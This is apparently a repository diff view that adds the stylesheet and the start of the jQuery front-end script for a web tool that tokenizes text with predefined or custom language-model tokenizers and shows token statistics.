+
444
+ .subtitle {
445
+ color: var(--secondary-text);
446
+ font-size: 1.1rem;
447
+ }
448
+
449
+ .model-selector {
450
+ position: relative;
451
+ min-width: 200px;
452
+ }
453
+
454
+ .model-selector-header {
455
+ display: flex;
456
+ gap: 0.5rem;
457
+ margin-bottom: 0.5rem;
458
+ }
459
+
460
+ .model-type-toggle {
461
+ display: flex;
462
+ background-color: var(--card-bg);
463
+ border-radius: 0.5rem;
464
+ padding: 0.25rem;
465
+ overflow: hidden;
466
+ }
467
+
468
+ .toggle-option {
469
+ padding: 0.5rem 0.75rem;
470
+ font-size: 0.8rem;
471
+ font-weight: 500;
472
+ cursor: pointer;
473
+ transition: var(--transition);
474
+ border-radius: 0.375rem;
475
+ color: var(--secondary-text);
476
+ }
477
+
478
+ .toggle-option.active {
479
+ background-color: var(--primary-color);
480
+ color: white;
481
+ }
482
+
483
+ select {
484
+ width: 100%;
485
+ padding: 0.75rem 1rem;
486
+ border: 2px solid var(--input-border);
487
+ border-radius: 0.5rem;
488
+ font-size: 1rem;
489
+ color: var(--text-color);
490
+ background-color: var(--input-bg);
491
+ cursor: pointer;
492
+ transition: var(--transition);
493
+ appearance: none;
494
+ background-image: url("data:image/svg+xml,%3Csvg xmlns='http://www.w3.org/2000/svg' viewBox='0 0 24 24' fill='%230f4f9b'%3E%3Cpath d='M7 10l5 5 5-5H7z'/%3E%3C/svg%3E");
495
+ background-repeat: no-repeat;
496
+ background-position: right 1rem center;
497
+ background-size: 1.5rem;
498
+ }
499
+
500
+ select:hover, .custom-model-input:hover {
501
+ border-color: var(--primary-color);
502
+ }
503
+
504
+ select:focus, .custom-model-input:focus {
505
+ outline: none;
506
+ border-color: var(--primary-color);
507
+ box-shadow: 0 0 0 3px rgba(15, 79, 155, 0.1);
508
+ }
509
+
510
+ .custom-model-input {
511
+ width: 100%;
512
+ padding: 0.75rem 1rem;
513
+ border: 2px solid var(--input-border);
514
+ border-radius: 0.5rem;
515
+ font-size: 1rem;
516
+ color: var(--text-color);
517
+ background-color: var(--input-bg);
518
+ transition: var(--transition);
519
+ }
520
+
521
+ .input-section {
522
+ margin-bottom: 2rem;
523
+ }
524
+
525
+ textarea {
526
+ width: 100%;
527
+ height: 150px;
528
+ padding: 1.25rem;
529
+ border: 2px solid var(--input-border);
530
+ border-radius: 0.75rem;
531
+ resize: vertical;
532
+ font-size: 1rem;
533
+ margin-bottom: 1rem;
534
+ transition: var(--transition);
535
+ background-color: var(--input-bg);
536
+ color: var(--text-color);
537
+ }
538
+
539
+ textarea:focus {
540
+ outline: none;
541
+ border-color: var(--input-focus);
542
+ box-shadow: 0 0 0 3px rgba(15, 79, 155, 0.1);
543
+ }
544
+
545
+ .button-container {
546
+ display: flex;
547
+ justify-content: center;
548
+ width: 100%;
549
+ gap: 1rem;
550
+ }
551
+
552
+ button {
553
+ padding: 0.875rem 2.5rem;
554
+ background: linear-gradient(135deg, var(--primary-color) 0%, var(--primary-hover) 100%);
555
+ color: #fff;
556
+ border: none;
557
+ border-radius: 0.75rem;
558
+ font-size: 1.1rem;
559
+ font-weight: 600;
560
+ cursor: pointer;
561
+ transition: var(--transition);
562
+ box-shadow: 0 4px 6px -1px rgba(15, 79, 155, 0.2);
563
+ }
564
+
565
+ button:hover {
566
+ transform: translateY(-2px);
567
+ box-shadow: 0 6px 8px -1px rgba(15, 79, 155, 0.3);
568
+ }
569
+
570
+ button:active {
571
+ transform: translateY(0);
572
+ }
573
+
574
+ button:disabled {
575
+ opacity: 0.7;
576
+ cursor: not-allowed;
577
+ }
578
+
579
+ .card {
580
+ background-color: var(--card-bg);
581
+ border-radius: 1rem;
582
+ box-shadow: var(--card-shadow);
583
+ padding: 1.5rem;
584
+ margin-bottom: 2rem;
585
+ transition: var(--transition);
586
+ }
587
+
588
+ .card:hover {
589
+ transform: translateY(-2px);
590
+ box-shadow: 0 6px 12px -2px rgba(0, 0, 0, 0.1);
591
+ }
592
+
593
+ .card-title {
594
+ font-size: 1.25rem;
595
+ font-weight: 700;
596
+ color: var(--text-color);
597
+ margin-bottom: 1.25rem;
598
+ display: flex;
599
+ align-items: center;
600
+ gap: 0.5rem;
601
+ cursor: pointer;
602
+ }
603
+
604
+ .card-title::before {
605
+ content: '';
606
+ display: block;
607
+ width: 4px;
608
+ height: 1.25rem;
609
+ background: linear-gradient(135deg, var(--primary-color) 0%, var(--primary-hover) 100%);
610
+ border-radius: 2px;
611
+ }
612
+
613
+ .token-container {
614
+ display: flex;
615
+ flex-wrap: wrap;
616
+ gap: 0.375rem;
617
+ margin-bottom: 1rem;
618
+ padding: 1rem;
619
+ background-color: #2a2a2a;
620
+ border-radius: 0.5rem;
621
+ max-height: 200px;
622
+ overflow-y: auto;
623
+ transition: max-height 0.3s ease;
624
+ }
625
+
626
+ .token-container.expanded {
627
+ max-height: none;
628
+ }
629
+
630
+ .token {
631
+ padding: 0.375rem 0.75rem;
632
+ border-radius: 0.375rem;
633
+ background-color: var(--input-bg);
634
+ font-family: 'SF Mono', 'Monaco', 'Inconsolata', 'Fira Mono', 'Droid Sans Mono', 'Source Code Pro', monospace;
635
+ font-size: 0.875rem;
636
+ color: var(--text-color);
637
+ cursor: default;
638
+ transition: var(--transition);
639
+ box-shadow: 0 1px 2px rgba(0, 0, 0, 0.05);
640
+ }
641
+
642
+ .token:hover {
643
+ transform: translateY(-1px);
644
+ box-shadow: 0 2px 4px rgba(0, 0, 0, 0.1);
645
+ }
646
+
647
+ .stats-grid {
648
+ display: grid;
649
+ grid-template-columns: repeat(auto-fit, minmax(200px, 1fr));
650
+ gap: 1.5rem;
651
+ margin-bottom: 2rem;
652
+ }
653
+
654
+ .stat-card {
655
+ background-color: var(--card-bg);
656
+ padding: 1.5rem;
657
+ border-radius: 1rem;
658
+ box-shadow: var(--card-shadow);
659
+ transition: var(--transition);
660
+ }
661
+
662
+ .stat-card:hover {
663
+ transform: translateY(-2px);
664
+ box-shadow: 0 6px 12px -2px rgba(0, 0, 0, 0.1);
665
+ }
666
+
667
+ .stat-title {
668
+ color: var(--secondary-text);
669
+ font-size: 0.875rem;
670
+ font-weight: 500;
671
+ margin-bottom: 0.5rem;
672
+ text-transform: uppercase;
673
+ letter-spacing: 0.05em;
674
+ }
675
+
676
+ .stat-value {
677
+ color: var(--text-color);
678
+ font-size: 2rem;
679
+ font-weight: 700;
680
+ line-height: 1.2;
681
+ margin-bottom: 0.25rem;
682
+ }
683
+
684
+ .stat-description {
685
+ color: var(--secondary-text);
686
+ font-size: 0.875rem;
687
+ }
688
+
689
+ .expand-button {
690
+ background: none;
691
+ border: none;
692
+ color: var(--primary-color);
693
+ font-size: 0.875rem;
694
+ padding: 0.5rem;
695
+ cursor: pointer;
696
+ display: block;
697
+ margin: 0 auto;
698
+ box-shadow: none;
699
+ }
700
+
701
+ .expand-button:hover {
702
+ text-decoration: underline;
703
+ transform: none;
704
+ box-shadow: none;
705
+ }
706
+
707
+ .error-message {
708
+ color: #EF4444;
709
+ background-color: #3a1f1f;
710
+ border: 1px solid #562626;
711
+ padding: 1rem;
712
+ border-radius: 0.5rem;
713
+ margin-bottom: 1rem;
714
+ display: none;
715
+ }
716
+
717
+ .display-limit-notice {
718
+ background-color: #4b2b07;
719
+ border: 1px solid #7c4a02;
720
+ color: #FFD591;
721
+ padding: 0.75rem;
722
+ border-radius: 0.5rem;
723
+ margin-top: 1rem;
724
+ font-size: 0.875rem;
725
+ display: none;
726
+ }
727
+
728
+ /* File drop zone styles */
729
+ .file-drop-zone {
730
+ position: fixed;
731
+ top: 0;
732
+ left: 0;
733
+ width: 100%;
734
+ height: 100%;
735
+ background-color: rgba(15, 79, 155, 0.15);
736
+ z-index: 1000;
737
+ display: flex;
738
+ justify-content: center;
739
+ align-items: center;
740
+ opacity: 0;
741
+ pointer-events: none;
742
+ transition: opacity 0.3s ease;
743
+ }
744
+
745
+ .file-drop-zone.active {
746
+ opacity: 1;
747
+ pointer-events: all;
748
+ }
749
+
750
+ .drop-indicator {
751
+ background-color: var(--card-bg);
752
+ border: 2px dashed var(--primary-color);
753
+ border-radius: 1rem;
754
+ padding: 2rem;
755
+ text-align: center;
756
+ width: 60%;
757
+ max-width: 400px;
758
+ box-shadow: 0 8px 32px rgba(0, 0, 0, 0.25);
759
+ animation: pulse 2s infinite;
760
+ }
761
+
762
+ @keyframes pulse {
763
+ 0% { transform: scale(1); }
764
+ 50% { transform: scale(1.05); }
765
+ 100% { transform: scale(1); }
766
+ }
767
+
768
+ .drop-indicator p {
769
+ margin-bottom: 0.5rem;
770
+ color: var(--text-color);
771
+ font-size: 1.2rem;
772
+ }
773
+
774
+ .file-icon {
775
+ font-size: 3rem;
776
+ margin-bottom: 1rem;
777
+ color: var(--primary-color);
778
+ }
779
+
780
+ .file-upload-icon {
781
+ position: fixed;
782
+ bottom: 20px;
783
+ left: 20px;
784
+ width: 45px;
785
+ height: 45px;
786
+ background-color: var(--card-bg);
787
+ border-radius: 50%;
788
+ display: flex;
789
+ justify-content: center;
790
+ align-items: center;
791
+ cursor: pointer;
792
+ z-index: 100;
793
+ box-shadow: 0 2px 10px rgba(0, 0, 0, 0.2);
794
+ transition: transform 0.2s ease, box-shadow 0.2s ease;
795
+ }
796
+
797
+ .file-upload-icon:hover {
798
+ transform: translateY(-2px);
799
+ box-shadow: 0 4px 15px rgba(0, 0, 0, 0.3);
800
+ }
801
+
802
+ .file-upload-icon span {
803
+ font-size: 1.5rem;
804
+ color: var(--primary-color);
805
+ }
806
+
807
+ .file-info {
808
+ position: fixed;
809
+ bottom: 20px;
810
+ left: 75px;
811
+ background-color: var(--card-bg);
812
+ color: var(--primary-color);
813
+ font-weight: 500;
814
+ padding: 0.5rem 1rem;
815
+ border-radius: 1rem;
816
+ box-shadow: 0 2px 10px rgba(0, 0, 0, 0.2);
817
+ max-width: 270px;
818
+ white-space: nowrap;
819
+ overflow: hidden;
820
+ text-overflow: ellipsis;
821
+ z-index: 100;
822
+ display: none;
823
+ }
824
+
825
+ .file-detach {
826
+ margin-left: 8px;
827
+ display: inline-block;
828
+ width: 18px;
829
+ height: 18px;
830
+ background-color: rgba(255, 255, 255, 0.1);
831
+ color: var(--text-color);
832
+ border-radius: 50%;
833
+ text-align: center;
834
+ line-height: 16px;
835
+ font-size: 12px;
836
+ cursor: pointer;
837
+ transition: all 0.2s ease;
838
+ }
839
+
840
+ .file-detach:hover {
841
+ background-color: rgba(255, 0, 0, 0.2);
842
+ color: #ff6b6b;
843
+ transform: scale(1.1);
844
+ }
845
+
846
+ .preview-notice {
847
+ background-color: #273c56;
848
+ border: 1px solid #365a82;
849
+ color: #89b4e8;
850
+ padding: 0.75rem;
851
+ border-radius: 0.5rem;
852
+ margin-top: 1rem;
853
+ font-size: 0.875rem;
854
+ display: none;
855
+ }
856
+
857
+ .custom-model-wrapper {
858
+ position: relative;
859
+ }
860
+
861
+ .model-badge {
862
+ position: absolute;
863
+ top: -10px;
864
+ right: -5px;
865
+ background: linear-gradient(135deg, #22c55e 0%, #15803d 100%);
866
+ color: white;
867
+ font-size: 0.7rem;
868
+ font-weight: 700;
869
+ padding: 0.25rem 0.5rem;
870
+ border-radius: 999px;
871
+ transform: scale(0);
872
+ transition: transform 0.3s cubic-bezier(0.175, 0.885, 0.32, 1.275);
873
+ box-shadow: 0 2px 5px rgba(0, 0, 0, 0.2);
874
+ z-index: 10;
875
+ }
876
+
877
+ .model-badge.show {
878
+ transform: scale(1);
879
+ }
880
+
881
+ .custom-model-help {
882
+ display: inline-block;
883
+ width: 16px;
884
+ height: 16px;
885
+ line-height: 16px;
886
+ font-size: 11px;
887
+ font-weight: bold;
888
+ text-align: center;
889
+ background-color: var(--secondary-text);
890
+ color: var(--card-bg);
891
+ border-radius: 50%;
892
+ margin-left: 5px;
893
+ cursor: help;
894
+ vertical-align: middle;
895
+ }
896
+
897
+ .tooltip {
898
+ position: absolute;
899
+ top: 100%;
900
+ left: 0;
901
+ width: 280px;
902
+ background-color: #333;
903
+ color: #fff;
904
+ padding: 0.75rem;
905
+ border-radius: 0.5rem;
906
+ font-size: 0.8rem;
907
+ margin-top: 0.5rem;
908
+ z-index: 100;
909
+ box-shadow: 0 4px 6px rgba(0, 0, 0, 0.1);
910
+ opacity: 0;
911
+ visibility: hidden;
912
+ transition: opacity 0.2s, visibility 0.2s;
913
+ }
914
+
915
+ .custom-model-help:hover + .tooltip {
916
+ opacity: 1;
917
+ visibility: visible;
918
+ }
919
+
920
+ /* Tokenizer info icon and tooltip styles */
921
+ .tokenizer-info-icon {
922
+ display: inline-flex;
923
+ align-items: center;
924
+ justify-content: center;
925
+ width: 24px;
926
+ height: 24px;
927
+ background: linear-gradient(135deg, var(--primary-color) 0%, var(--primary-hover) 100%);
928
+ color: white;
929
+ border-radius: 50%;
930
+ position: absolute;
931
+ left: -32px; /* Position to the left of the selector */
932
+ top: 50%;
933
+ transform: translateY(-50%);
934
+ cursor: pointer;
935
+ font-size: 12px;
936
+ font-weight: bold;
937
+ transition: all 0.2s ease;
938
+ z-index: 10;
939
+ box-shadow: 0 2px 4px rgba(0, 0, 0, 0.2);
940
+ }
941
+
942
+ .tokenizer-info-icon:hover {
943
+ transform: translateY(-50%) scale(1.1);
944
+ box-shadow: 0 3px 8px rgba(0, 0, 0, 0.3);
945
+ }
946
+
947
+ /* Watermark styles */
948
+ .watermark {
949
+ position: fixed;
950
+ bottom: 20px;
951
+ right: 20px;
952
+ color: var(--primary-color);
953
+ font-size: 1.4rem;
954
+ font-weight: 700;
955
+ opacity: 0.25; /* Semi-transparent */
956
+ z-index: 100;
957
+ transition: opacity 0.3s ease;
958
+ text-decoration: none;
959
+ pointer-events: auto; /* Ensure it remains clickable */
960
+ }
961
+
962
+ .watermark:hover {
963
+ opacity: 0.6; /* Increase opacity on hover */
964
+ }
965
+
966
+ .tokenizer-info-tooltip {
967
+ position: absolute;
968
+ top: calc(100% + 8px);
969
+ left: -30px; /* Adjust position to align with the icon */
970
+ width: 300px;
971
+ background-color: var(--card-bg);
972
+ color: var(--text-color);
973
+ border: 1px solid var(--primary-color);
974
+ border-radius: 0.75rem;
975
+ box-shadow: 0 5px 15px rgba(0, 0, 0, 0.3);
976
+ padding: 1rem;
977
+ z-index: 1000; /* Increase z-index to ensure visibility */
978
+ opacity: 0;
979
+ visibility: hidden;
980
+ transition: opacity 0.3s, visibility 0.3s;
981
+ pointer-events: none; /* Initially disable pointer events */
982
+ }
983
+
984
+ .tokenizer-info-icon:not(.tooltip-disabled):hover + .tokenizer-info-tooltip {
985
+ opacity: 1;
986
+ visibility: visible;
987
+ pointer-events: auto;
988
+ }
989
+
990
+ .tokenizer-info-tooltip:hover {
991
+ opacity: 1;
992
+ visibility: visible;
993
+ pointer-events: auto;
994
+ }
995
+
996
+ .tokenizer-info-header {
997
+ font-size: 1.1rem;
998
+ font-weight: 600;
999
+ margin-bottom: 0.5rem;
1000
+ padding-bottom: 0.5rem;
1001
+ border-bottom: 1px solid rgba(255, 255, 255, 0.1);
1002
+ color: var(--primary-color);
1003
+ }
1004
+
1005
+ .tokenizer-info-grid {
1006
+ display: grid;
1007
+ grid-template-columns: repeat(2, 1fr);
1008
+ gap: 0.75rem;
1009
+ margin: 0.75rem 0;
1010
+ }
1011
+
1012
+ .tokenizer-info-item {
1013
+ display: flex;
1014
+ flex-direction: column;
1015
+ }
1016
+
1017
+ .tokenizer-info-label {
1018
+ font-size: 0.75rem;
1019
+ color: var(--secondary-text);
1020
+ margin-bottom: 0.25rem;
1021
+ }
1022
+
1023
+ .tokenizer-info-value {
1024
+ font-size: 0.95rem;
1025
+ font-weight: 500;
1026
+ }
1027
+
1028
+ .special-tokens-container {
1029
+ margin-top: 0.75rem;
1030
+ background-color: rgba(15, 79, 155, 0.1);
1031
+ border-radius: 0.5rem;
1032
+ padding: 0.5rem;
1033
+ max-height: 100px;
1034
+ overflow-y: auto;
1035
+ }
1036
+
1037
+ .special-token-item {
1038
+ display: flex;
1039
+ justify-content: space-between;
1040
+ margin-bottom: 0.25rem;
1041
+ font-size: 0.8rem;
1042
+ }
1043
+
1044
+ .token-name {
1045
+ color: var(--secondary-text);
1046
+ }
1047
+
1048
+ .token-value {
1049
+ background-color: rgba(255, 255, 255, 0.1);
1050
+ padding: 1px 4px;
1051
+ border-radius: 2px;
1052
+ font-family: monospace;
1053
+ }
1054
+
1055
+ .tokenizer-info-loading {
1056
+ display: flex;
1057
+ justify-content: center;
1058
+ align-items: center;
1059
+ height: 100px;
1060
+ }
1061
+
1062
+ .tokenizer-info-spinner {
1063
+ width: 30px;
1064
+ height: 30px;
1065
+ border: 3px solid var(--primary-color);
1066
+ border-radius: 50%;
1067
+ border-top-color: transparent;
1068
+ animation: spin 1s linear infinite;
1069
+ }
1070
+
1071
+ .tokenizer-info-error {
1072
+ color: #f87171;
1073
+ font-size: 0.9rem;
1074
+ text-align: center;
1075
+ padding: 1rem;
1076
+ }
1077
+
1078
+ /* Mobile responsiveness improvements */
1079
+ @media (max-width: 768px) {
1080
+ body {
1081
+ padding: 1rem;
1082
+ }
1083
+
1084
+ .container {
1085
+ max-width: 100%;
1086
+ }
1087
+
1088
+ .header {
1089
+ flex-direction: column;
1090
+ align-items: stretch;
1091
+ gap: 1rem;
1092
+ }
1093
+
1094
+ .title {
1095
+ font-size: 2rem;
1096
+ }
1097
+
1098
+ .subtitle {
1099
+ font-size: 1rem;
1100
+ }
1101
+
1102
+ .model-selector {
1103
+ width: 100%;
1104
+ }
1105
+
1106
+ .model-type-toggle {
1107
+ justify-content: center;
1108
+ }
1109
+
1110
+ .toggle-option {
1111
+ flex: 1;
1112
+ text-align: center;
1113
+ }
1114
+
1115
+ textarea {
1116
+ height: 120px;
1117
+ font-size: 16px; /* Prevents zoom on iOS */
1118
+ }
1119
+
1120
+ .keyboard-shortcut-hint {
1121
+ top: 5px;
1122
+ right: 5px;
1123
+ font-size: 0.7rem;
1124
+ padding: 0.2rem 0.4rem;
1125
+ }
1126
+
1127
+ .search-toggle-btn {
1128
+ width: 32px;
1129
+ height: 32px;
1130
+ min-width: 32px;
1131
+ min-height: 32px;
1132
+ }
1133
+
1134
+ .search-toggle-btn svg {
1135
+ width: 16px;
1136
+ height: 16px;
1137
+ }
1138
+
1139
+ .stats-grid {
1140
+ grid-template-columns: 1fr;
1141
+ gap: 1rem;
1142
+ }
1143
+
1144
+ .stat-card {
1145
+ padding: 1rem;
1146
+ }
1147
+
1148
+ .stat-value {
1149
+ font-size: 1.5rem;
1150
+ }
1151
+
1152
+ .token-container {
1153
+ max-height: 150px;
1154
+ font-size: 0.8rem;
1155
+ }
1156
+
1157
+ .token {
1158
+ padding: 0.25rem 0.5rem;
1159
+ font-size: 0.75rem;
1160
+ }
1161
+
1162
+ .token-search-container {
1163
+ padding: 1rem;
1164
+ }
1165
+
1166
+ .token-search-row {
1167
+ flex-direction: column;
1168
+ gap: 1rem;
1169
+ }
1170
+
1171
+ .token-search-controls {
1172
+ justify-content: space-between;
1173
+ flex-wrap: wrap;
1174
+ gap: 0.5rem;
1175
+ }
1176
+
1177
+ .token-search-btn {
1178
+ flex: 1;
1179
+ min-width: 60px;
1180
+ }
1181
+
1182
+ .token-search-count {
1183
+ order: -1;
1184
+ width: 100%;
1185
+ text-align: center;
1186
+ margin-bottom: 0.5rem;
1187
+ }
1188
+
1189
+ .token-search-input {
1190
+ font-size: 16px; /* Prevents zoom on iOS */
1191
+ }
1192
+
1193
+ .frequency-chart-container {
1194
+ margin-top: 1rem;
1195
+ padding: 0.75rem;
1196
+ }
1197
+
1198
+ .frequency-chart-title {
1199
+ flex-direction: column;
1200
+ gap: 0.75rem;
1201
+ align-items: stretch;
1202
+ text-align: center;
1203
+ }
1204
+
1205
+ .frequency-item {
1206
+ flex-direction: column;
1207
+ gap: 0.5rem;
1208
+ align-items: stretch;
1209
+ }
1210
+
1211
+ .frequency-token {
1212
+ align-self: flex-start;
1213
+ min-width: auto;
1214
+ }
1215
+
1216
+ .frequency-bar-container {
1217
+ width: 100%;
1218
+ }
1219
+
1220
+ .tokenizer-info-tooltip {
1221
+ width: 280px;
1222
+ left: -50px;
1223
+ }
1224
+
1225
+ .tokenizer-info-grid {
1226
+ grid-template-columns: 1fr;
1227
+ }
1228
+
1229
+ .file-info {
1230
+ max-width: 200px;
1231
+ font-size: 0.8rem;
1232
+ }
1233
+
1234
+ .loading-content {
1235
+ padding: 1.5rem;
1236
+ min-width: 150px;
1237
+ }
1238
+
1239
+ .loading-text {
1240
+ font-size: 1rem;
1241
+ }
1242
+
1243
+ .button-container {
1244
+ flex-direction: column;
1245
+ align-items: stretch;
1246
+ }
1247
+
1248
+ button {
1249
+ padding: 1rem 2rem;
1250
+ font-size: 1rem;
1251
+ }
1252
+ }
1253
+
1254
+ @media (max-width: 480px) {
1255
+ body {
1256
+ padding: 0.5rem;
1257
+ }
1258
+
1259
+ .title {
1260
+ font-size: 1.75rem;
1261
+ }
1262
+
1263
+ .card {
1264
+ padding: 1rem;
1265
+ }
1266
+
1267
+ .stat-card {
1268
+ padding: 0.75rem;
1269
+ }
1270
+
1271
+ .token-container {
1272
+ padding: 0.75rem;
1273
+ gap: 0.25rem;
1274
+ }
1275
+
1276
+ .token {
1277
+ padding: 0.2rem 0.4rem;
1278
+ font-size: 0.7rem;
1279
+ }
1280
+
1281
+ .tokenizer-info-tooltip {
1282
+ width: 260px;
1283
+ left: -60px;
1284
+ }
1285
+
1286
+ .frequency-chart-container {
1287
+ padding: 0.5rem;
1288
+ }
1289
+
1290
+ .frequency-item {
1291
+ padding: 0.375rem;
1292
+ }
1293
+
1294
+ .frequency-token {
1295
+ font-size: 0.7rem;
1296
+ padding: 0.2rem 0.4rem;
1297
+ }
1298
+ }
app/static/js/main.js ADDED
@@ -0,0 +1,837 @@
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
 
1
+ $(document).ready(function() {
2
+ // File handling variables
3
+ let currentFile = null;
4
+ let originalTextContent = null;
5
+ let lastUploadedFileName = null;
6
+ let fileJustUploaded = false; // Flag to prevent immediate detachment
7
+ let currentModelType = window.tokenizerData?.model_type || 'predefined';
8
+ let currentTokenizerInfo = null;
9
+
10
+ // Try to parse tokenizer info if available from server
11
+ try {
12
+ currentTokenizerInfo = window.tokenizerData?.tokenizer_info || null;
13
+ if (currentTokenizerInfo) {
14
+ updateTokenizerInfoDisplay(currentTokenizerInfo, currentModelType === 'custom');
15
+ }
16
+ } catch(e) {
17
+ console.error("Error parsing tokenizer info:", e);
18
+ }
19
+
20
+ // Show error if exists
21
+ if (window.tokenizerData?.error) {
22
+ showError(window.tokenizerData.error);
23
+ }
24
+
25
+ // Setup model type based on initial state
26
+ if (currentModelType === "custom") {
27
+ $('.toggle-option').removeClass('active');
28
+ $('.custom-toggle').addClass('active');
29
+ $('#predefinedModelSelector').hide();
30
+ $('#customModelSelector').show();
31
+ }
32
+
33
+ // Show success badge if custom model loaded successfully
34
+ if (currentModelType === "custom" && !window.tokenizerData?.error) {
35
+ $('#modelSuccessBadge').addClass('show');
36
+ setTimeout(() => {
37
+ $('#modelSuccessBadge').removeClass('show');
38
+ }, 3000);
39
+ }
40
+
41
+ // Toggle between predefined and custom model inputs
42
+ $('.toggle-option').click(function() {
43
+ const modelType = $(this).data('type');
44
+ $('.toggle-option').removeClass('active');
45
+ $(this).addClass('active');
46
+ currentModelType = modelType;
47
+
48
+ if (modelType === 'predefined') {
49
+ $('#predefinedModelSelector').show();
50
+ $('#customModelSelector').hide();
51
+ $('#modelTypeInput').val('predefined');
52
+ // Set the model input value to the selected predefined model
53
+ $('#modelInput').val($('#modelSelect').val());
54
+ } else {
55
+ $('#predefinedModelSelector').hide();
56
+ $('#customModelSelector').show();
57
+ $('#modelTypeInput').val('custom');
58
+ }
59
+
60
+ // Clear tokenizer info if switching models
61
+ if (modelType === 'predefined') {
62
+ $('#tokenizerInfoContent').html('<div class="tokenizer-info-loading"><div class="tokenizer-info-spinner"></div></div>');
63
+ fetchTokenizerInfo($('#modelSelect').val(), false);
64
+ } else {
65
+ $('#customTokenizerInfoContent').html('<div class="tokenizer-info-loading"><div class="tokenizer-info-spinner"></div></div>');
66
+ // Only fetch if there's a custom model value
67
+ const customModel = $('#customModelInput').val();
68
+ if (customModel) {
69
+ fetchTokenizerInfo(customModel, true);
70
+ }
71
+ }
72
+ });
73
+
74
+ // Update hidden input when custom model input changes
75
+ $('#customModelInput').on('input', function() {
76
+ $('#customModelInputHidden').val($(this).val());
77
+ });
78
+
79
+ function showError(message) {
80
+ const errorDiv = $('#errorMessage');
81
+ errorDiv.text(message);
82
+ errorDiv.show();
83
+ setTimeout(() => errorDiv.fadeOut(), 5000);
84
+ }
85
+
86
+ // Function to update tokenizer info display in tooltip
87
+ function updateTokenizerInfoDisplay(info, isCustom = false) {
88
+ const targetSelector = isCustom ? '#customTokenizerInfoContent' : '#tokenizerInfoContent';
89
+ let htmlContent = '';
90
+
91
+
92
+ if (info.error) {
93
+ $(targetSelector).html(`<div class="tokenizer-info-error">${info.error}</div>`);
94
+ return;
95
+ }
96
+
97
+ // Start building the tooltip content
98
+ htmlContent = `<div class="tokenizer-info-header">Tokenizer Details</div>
99
+ <div class="tokenizer-info-grid">`;
100
+
101
+ // Dictionary size
102
+ if (info.vocab_size) {
103
+ htmlContent += `
104
+ <div class="tokenizer-info-item">
105
+ <span class="tokenizer-info-label">Dictionary Size</span>
106
+ <span class="tokenizer-info-value">${info.vocab_size.toLocaleString()}</span>
107
+ </div>`;
108
+ }
109
+
110
+ // Tokenizer type
111
+ if (info.tokenizer_type) {
112
+ htmlContent += `
113
+ <div class="tokenizer-info-item">
114
+ <span class="tokenizer-info-label">Tokenizer Type</span>
115
+ <span class="tokenizer-info-value">${info.tokenizer_type}</span>
116
+ </div>`;
117
+ }
118
+
119
+
120
+ // Max length
121
+ if (info.model_max_length) {
122
+ htmlContent += `
123
+ <div class="tokenizer-info-item">
124
+ <span class="tokenizer-info-label">Max Length</span>
125
+ <span class="tokenizer-info-value">${info.model_max_length.toLocaleString()}</span>
126
+ </div>`;
127
+ }
128
+
129
+ htmlContent += `</div>`; // Close tokenizer-info-grid
130
+
131
+ // Special tokens section
132
+ if (info.special_tokens && Object.keys(info.special_tokens).length > 0) {
133
+ htmlContent += `
134
+ <div class="tokenizer-info-item" style="margin-top: 0.75rem;">
135
+ <span class="tokenizer-info-label">Special Tokens</span>
136
+ <div class="special-tokens-container">`;
137
+
138
